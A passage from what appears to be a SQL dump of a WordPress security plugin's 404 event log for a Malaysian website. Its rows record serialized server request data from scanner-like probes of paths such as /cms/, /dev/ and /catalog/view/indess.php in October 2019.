Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/cms/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/cms/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAKHZRr7NRBVHKuKoMgPwAAAJg\";s:12:\"REDIRECT_URL\";s:5:\"/cms/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"54789\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/cms/\";s:10:\"SCRIPT_URL\";s:5:\"/cms/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAKHZRr7NRBVHKuKoMgPwAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571818013.7531\";s:12:\"REQUEST_TIME\";s:10:\"1571818013\";}}','notice','2019-10-23 08:06:56','2019-10-23 08:06:54',34968128,36770848,'https://bintara.com.my/cms/',1,0,'51.75.95.185'),(28860,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:5:\"/dev/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/dev/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/dev/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAKK5Rr7NRBVHKuKoMgTQAAAJY\";s:12:\"REDIRECT_URL\";s:5:\"/dev/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"63657\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/dev/\";s:10:\"SCRIPT_URL\";s:5:\"/dev/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAKK5Rr7NRBVHKuKoMgTQAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571818027.7327\";s:12:\"REQUEST_TIME\";s:10:\"1571818027\";}}','notice','2019-10-23 08:07:12','2019-10-23 08:07:09',34968128,36770848,'https://bintara.com.my/dev/',1,0,'51.75.95.185'),(28861,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/portal/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/portal/\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/portal/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAKO3lonjnFhdaVmZhfGAAAAQI\";s:12:\"REDIRECT_URL\";s:8:\"/portal/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"65447\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/portal/\";s:10:\"SCRIPT_URL\";s:8:\"/portal/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAKO3lonjnFhdaVmZhfGAAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571818043.841\";s:12:\"REQUEST_TIME\";s:10:\"1571818043\";}}','notice','2019-10-23 08:07:27','2019-10-23 08:07:24',34968032,36773896,'https://bintara.com.my/portal/',1,0,'51.75.95.185'),(28862,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:5:\"/web/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/web/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/web/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAKR3lonjnFhdaVmZhfHgAAARg\";s:12:\"REDIRECT_URL\";s:5:\"/web/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"58628\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/web/\";s:10:\"SCRIPT_URL\";s:5:\"/web/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAKR3lonjnFhdaVmZhfHgAAARg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571818055.6231\";s:12:\"REQUEST_TIME\";s:10:\"1571818055\";}}','notice','2019-10-23 08:07:39','2019-10-23 08:07:36',34968128,36770848,'https://bintara.com.my/web/',1,0,'51.75.95.185'),(28863,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/temp/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c646b7df83c46b8bcb3c78cb409f224a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/temp/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/temp/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAKV1mW5vMCSrSDDljUJgAAAAY\";s:12:\"REDIRECT_URL\";s:6:\"/temp/\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.95.185\";s:11:\"REMOTE_PORT\";s:5:\"64937\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/temp/\";s:10:\"SCRIPT_URL\";s:6:\"/temp/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAKV1mW5vMCSrSDDljUJgAAAAY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571818071.5388\";s:12:\"REQUEST_TIME\";s:10:\"1571818071\";}}','notice','2019-10-23 08:07:55','2019-10-23 08:07:52',34967560,36777544,'https://bintara.com.my/temp/',1,0,'51.75.95.185'),(28864,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:72:\"text/html,application/xhtml+xml,application/xml,image/*;q=0.9,*/*; q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:19:\"utf-8;q=0.7,*;q=0.7\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.5,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:5:\"Close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.154.168.193\";s:11:\"REMOTE_PORT\";s:5:\"59695\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAPgHIIkjpJzJ2025LKPgAAAEU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571819393.0701\";s:12:\"REQUEST_TIME\";s:10:\"1571819393\";}}','notice','2019-10-23 08:29:55','2019-10-23 08:29:53',35312264,37117976,'https://bintara.com.my/?page_id=18',1,0,'195.154.168.193'),(28865,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.161.136.35\";s:11:\"REMOTE_PORT\";s:5:\"65157\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAcIJRr7NRBVHKuKoM4nQAAAI4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571822624.3243\";s:12:\"REQUEST_TIME\";s:10:\"1571822624\";}}','notice','2019-10-23 09:23:51','2019-10-23 09:23:45',35314960,37120648,'https://bintara.com.my/?page_id=18',1,0,'108.161.136.35'),(28866,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:143:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.68 (Edition Baidu)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.198.127.26\";s:11:\"REMOTE_PORT\";s:5:\"54548\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAffXlonjnFhdaVmZhupAAAARU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571823485.3058\";s:12:\"REQUEST_TIME\";s:10:\"1571823485\";}}','notice','2019-10-23 09:38:11','2019-10-23 09:38:06',35317512,37122576,'https://bintara.com.my/?page_id=18',1,0,'192.198.127.26'),(28867,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:56:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/catalog/view/indess.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/catalog/view/indess.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/catalog/view/indess.php\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbAtzJRr7NRBVHKuKoNOcwAAAIw\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/catalog/view/indess.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/catalog/view/indess.php\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbAtzJRr7NRBVHKuKoNOcwAAAIw\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/catalog/view/indess.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/catalog/view/indess.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbAtzJRr7NRBVHKuKoNOcwAAAIw\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/catalog/view/indess.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/catalog/view/indess.php\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAtzJRr7NRBVHKuKoNOcwAAAIw\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.138.188\";s:11:\"REMOTE_PORT\";s:5:\"38448\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/catalog/view/indess.php\";s:10:\"SCRIPT_URL\";s:24:\"/catalog/view/indess.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbAtzJRr7NRBVHKuKoNOcwAAAIw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571827148.4119\";s:12:\"REQUEST_TIME\";s:10:\"1571827148\";}}','notice','2019-10-23 10:39:11','2019-10-23 10:39:08',34979680,36788688,'https://bintara.com.my/catalog/view/indess.php',1,0,'5.135.138.188'),(28868,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571828615.4755129814147949218750\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571828615.4755129814147949218750\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; 